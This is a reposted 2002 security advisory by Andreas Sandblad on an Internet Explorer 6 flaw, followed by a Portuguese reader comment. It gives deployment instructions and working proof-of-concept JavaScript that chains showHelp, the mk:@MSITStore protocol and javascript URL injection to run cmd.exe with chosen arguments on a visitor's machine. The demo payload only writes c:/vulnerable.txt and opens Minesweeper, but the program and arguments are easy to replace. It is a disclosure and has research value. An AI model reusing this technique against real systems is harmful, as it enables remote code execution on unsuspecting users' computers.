    In order for not having to put scr1pt in 3 separate files I have combined
    them into one single file. The scr1pt will check for text after the # sign
    in the url to determine what to perform (url's hash). If your computer is
    heavily loaded, then the value of the setTimeout timer has to be
    increased. The timer is needed because the "mk:@MSITStore:C:" url is not
    set directly by IE.

    INSTRUCTIONS:
    1. Copy the content below and place it in a html file.
    2. REMOVE THE * FROM THE SCR1PT TAG.
    3. Place the file on a remote webserver and load it in IE (URL MUST START
    WITH HTTP://).
    4. The scr1pt will open up a dos window and display a line of text, create
    the file c:/vulnerable.txt (write permission required) and start winmine
    (this excellent game must exist). The help window for IE will not be
    closed.

    TESTED:
    Win2000 pro, XP, IE 6 (latest patches).

    --------------------------- CUT HERE ---------------------------

    // "How to execute programs with parameters in IE", 2002-11-06
    // Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se
    prog = 'cmd';
    args = '/k echo You are vulnerable (Sandblad #10) & '+
                  'echo Sandblad #10 > c:/vulnerable.txt & winmine';

    if (!location.hash) {
        showHelp(location+"#1");
        showHelp("iexplore.chm");
        blur();
    }
    else if (location.hash == "#1")
        open(location+"2").blur();
    else {
        f = opener.location.assign;
        opener.location="res:";
        f("javascr1pt:location.replace('mk:@MSITStore:C:')");
        setTimeout('run()',1000);
    }
    function run() {
        f("javascr1pt:document.write('')");
        f("javascr1pt:c1.Click();c2.Click();");
        close();
    }

    --------------------------- CUT HERE ---------------------------

    (5) Disclaimer:
    ===============
    Andreas Sandblad is not responsible for the misuse of the
    information provided in this advisory. The opinions expressed
    are my own and not of any company. In no event shall the author
    be liable for any damages whatsoever arising out of or in
    connection with the use or spread of this advisory. Any use of
    the information is at the user's own risk.

    (6) Feedback:
    =============
    Please send suggestions and comments to: _ _
    sandblad@acc.umu.se o' \,=./ `o
                                                                                                            (o o)
    ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
    Andreas Sandblad, student in Engineering Physics and
    Computing Science at Umea University, Sweden.
    -/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--

    Re:How to execute programs with parameters in IE (Pontos:2)
    por ^magico^ em 20-11-02 12:43 GMT (#62)
    (Utilizador Info)
    Mas.... ohhh :( isso não funciona no Mozilla!!!
    Raios partam a Microsoft, nunca segue o 'standard'.

     

     

    [ Topo | Sugerir artigo | Artigos anteriores | Sondagens passadas | FAQ | Editores | Preferências | Contacto ]